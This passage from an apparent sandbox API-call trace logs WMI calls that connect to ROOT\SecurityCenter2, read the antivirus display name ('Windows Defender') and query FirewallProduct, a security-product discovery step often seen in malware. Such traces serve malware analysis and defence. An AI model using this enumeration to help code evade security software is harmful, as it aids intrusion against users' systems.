wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266f4c8*=0, plFlavor=0x266f4cc*=0 | out: pVal=0x38f060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x266f4c8*=8, plFlavor=0x266f4cc*=0) returned 0x0 [0236.079] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.079] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.079] IWbemClassObject:Get (in: This=0x560db08, wszName="displayName", lFlags=0, pVal=0x38f068*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266f4c8*=8, plFlavor=0x266f4cc*=0 | out: pVal=0x38f068*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x266f4c8*=8, plFlavor=0x266f4cc*=0) returned 0x0 [0236.079] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.079] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.080] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f064 | out: puCount=0x38f064*=0x2) returned 0x0 [0236.080] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f060*=0x0, pszText=0x0 | out: puBuffLength=0x38f060*=0x19, pszText=0x0) returned 0x0 [0236.080] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f060*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f060*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.080] IWbemClassObject:Get (in: This=0x560db08, wszName="displayName", lFlags=0, pVal=0x38f060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266f5d8*=0, plFlavor=0x266f5dc*=0 | out: pVal=0x38f060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x266f5d8*=8, plFlavor=0x266f5dc*=0) returned 0x0 [0236.080] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.080] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.080] IWbemClassObject:Get (in: This=0x560db08, wszName="displayName", lFlags=0, pVal=0x38f068*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266f5d8*=8, plFlavor=0x266f5dc*=0 | out: pVal=0x38f068*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x266f5d8*=8, plFlavor=0x266f5dc*=0) returned 0x0 [0236.080] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.080] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0236.080] CoTaskMemAlloc (cb=0x4) returned 0x5642ae0 [0236.080] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642ae0, puReturned=0x266ebd0 | out: apObjects=0x5642ae0*=0x0, puReturned=0x266ebd0*=0x0) returned 0x1 [0236.081] CoTaskMemFree (pv=0x5642ae0) [0236.081] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0236.081] IUnknown:Release (This=0x544f098) returned 0x1 [0236.081] IUnknown:Release (This=0x544f098) returned 0x0 [0236.082] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0236.082] IUnknown:Release (This=0x544efd0) returned 0x1 [0236.082] IUnknown:Release (This=0x544efd0) returned 0x0 [0236.084] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0236.084] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0236.084] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0236.084] IUnknown:Release (This=0x6d0cac) returned 0x1 [0236.085] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x5642ae0) returned 0x0 [0236.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642ae0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0236.085] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642ae0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x5644618) returned 0x0 [0236.085] WbemDefPath:IUnknown:Release (This=0x5642ae0) returned 0x0 [0236.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x5644618) returned 0x0 [0236.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0236.086] WbemDefPath:IUnknown:AddRef (This=0x5644618) returned 0x3 [0236.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0236.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0236.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x5642a60) returned 0x0 [0236.086] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642a60, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0236.086] WbemDefPath:IUnknown:Release (This=0x5642a60) returned 0x3 [0236.086] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0236.086] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0236.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0236.099] WbemDefPath:IUnknown:Release (This=0x5644618) returned 0x2 [0236.099] WbemDefPath:IUnknown:Release (This=0x5644618) returned 0x1 [0236.100] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0236.100] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0236.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644618, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x5644618) returned 0x0 [0236.100] WbemDefPath:IUnknown:AddRef (This=0x5644618) returned 0x3 [0236.100] WbemDefPath:IUnknown:Release (This=0x5644618) returned 0x2 [0236.100] WbemDefPath:IWbemPath:SetText (This=0x5644618, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644618, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x19, pszText=0x0) returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f0ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f0ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644618, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x19, pszText=0x0) returned 0x0 [0236.101] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f098*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f098*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.101] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0236.101] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0236.102] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0236.102] IUnknown:Release (This=0x6d0cac) returned 0x1 [0236.103] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563ae48) returned 0x0 [0236.104] WbemLocator:IUnknown:QueryInterface (in: This=0x563ae48, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0236.104] WbemLocator:IClassFactory:CreateInstance (in: This=0x563ae48, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x5642a90) returned 0x0 [0236.104] WbemLocator:IUnknown:Release (This=0x563ae48) returned 0x0 [0236.104] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x5642a90) returned 0x0 [0236.104] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0236.105] WbemLocator:IUnknown:AddRef (This=0x5642a90) returned 0x3 [0236.105] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0236.105] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0236.105] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0236.105] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0236.105] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0236.105] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0236.105] WbemLocator:IUnknown:Release (This=0x5642a90) returned 0x2 [0236.105] WbemLocator:IUnknown:Release (This=0x5642a90) returned 0x1 [0236.105] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0236.105] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0236.105] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a90, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x5642a90) returned 0x0 [0236.105] WbemLocator:IUnknown:AddRef (This=0x5642a90) returned 0x3 [0236.105] WbemLocator:IUnknown:Release (This=0x5642a90) returned 0x2 [0236.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644618, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0236.106] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x19, pszText=0x0) returned 0x0 [0236.106] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=8, puBuffLength=0x38f004*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f004*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.106] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x5642a70) returned 0x0 [0236.106] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642a70, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563fe08) returned 0x0 [0236.312] WbemLocator:IUnknown:QueryInterface (in: This=0x563fe08, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c570c) returned 0x0 [0236.312] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c570c, pProxy=0x563fe08, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0236.312] WbemLocator:IUnknown:Release (This=0x55c570c) returned 0x1 [0236.312] WbemLocator:IUnknown:QueryInterface (in: This=0x563fe08, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c572c) returned 0x0 [0236.312] WbemLocator:IUnknown:QueryInterface (in: This=0x563fe08, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c570c) returned 0x0 [0236.312] WbemLocator:IClientSecurity:SetBlanket (This=0x55c570c, pProxy=0x563fe08, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0236.313] WbemLocator:IUnknown:Release (This=0x55c570c) returned 0x2 [0236.313] WbemLocator:IUnknown:Release (This=0x55c572c) returned 0x1 [0236.313] CoTaskMemFree (pv=0x55fedc8) [0236.313] WbemLocator:IUnknown:AddRef (This=0x563fe08) returned 0x2 [0236.313] WbemLocator:IUnknown:Release (This=0x5642a70) returned 0x0 [0236.313] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0236.313] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0236.314] WbemLocator:IUnknown:QueryInterface (in: This=0x563fe08, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5714) returned 0x0 [0236.314] WbemLocator:IRpcOptions:Query (in: This=0x55c5714, pPrx=0x563ae30, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0236.314] WbemLocator:IUnknown:Release (This=0x55c5714) returned 0x2 [0236.314] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0236.314] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0236.314] WbemLocator:IUnknown:QueryInterface (in: This=0x563fe08, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563fe08) returned 0x0 [0236.314] WbemLocator:IUnknown:Release (This=0x563fe08) returned 0x2 [0236.314] SysStringLen (param_1=0x0) returned 0x0 [0236.314] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0236.314] IWbemServices:ExecQuery (in: This=0x563fe08, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0236.316] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee70 | out: ppvObject=0x38ee70*=0x544efd4) returned 0x0 [0236.317] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eec0, pAuthzSvc=0x38eebc, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8, pImpLevel=0x38eea8, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0 | out: pAuthnSvc=0x38eec0*=0xa, pAuthzSvc=0x38eebc*=0x0, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8*=0x6, pImpLevel=0x38eea8*=0x2, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0*=0x1) returned 0x0 [0236.317] IUnknown:Release (This=0x544efd4) returned 0x1 [0236.317] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee64 | out: ppvObject=0x38ee64*=0x55c4bec) returned 0x0 [0236.317] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee50 | out: ppvObject=0x38ee50*=0x544efd4) returned 0x0 [0236.317] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0236.318] IUnknown:Release (This=0x544efd4) returned 0x2 [0236.318] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0236.318] CoTaskMemFree (pv=0x55fed68) [0236.318] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0236.319] CoGetContextToken (in: pToken=0x38e390 | out: pToken=0x38e390) returned 0x0 [0236.319] CoGetContextToken (in: pToken=0x38e7a4 | out: pToken=0x38e7a4) returned 0x0 [0236.319] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e73c | out: ppvObject=0x38e73c*=0x55c4bd4) returned 0x0 [0236.319] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563ae78, dwProperty=2, pdwValue=0x38e830 | out: pdwValue=0x38e830) returned 0x80004002 [0236.319] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0236.319] CoGetContextToken (in: pToken=0x38ed74 | out: pToken=0x38ed74) returned 0x0 [0236.319] CoGetContextToken (in: pToken=0x38ecd4 | out: pToken=0x38ecd4) returned 0x0 [0236.319] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38eda4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec70 | out: ppvObject=0x38ec70*=0x544efd0) returned 0x0 [0236.320] IUnknown:Release (This=0x544efd0) returned 0x2 [0236.320] SysStringLen (param_1=0x0) returned 0x0 [0236.320] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644618, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0236.320] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x19, pszText=0x0) returned 0x0 [0236.320] WbemDefPath:IWbemPath:GetText (in: This=0x5644618, lFlags=4, puBuffLength=0x38f05c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f05c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.320] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0236.320] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0236.321] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0236.321] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0236.321] IUnknown:Release (This=0x544f09c) returned 0x1 [0236.321] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c590c) returned 0x0 [0236.322] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 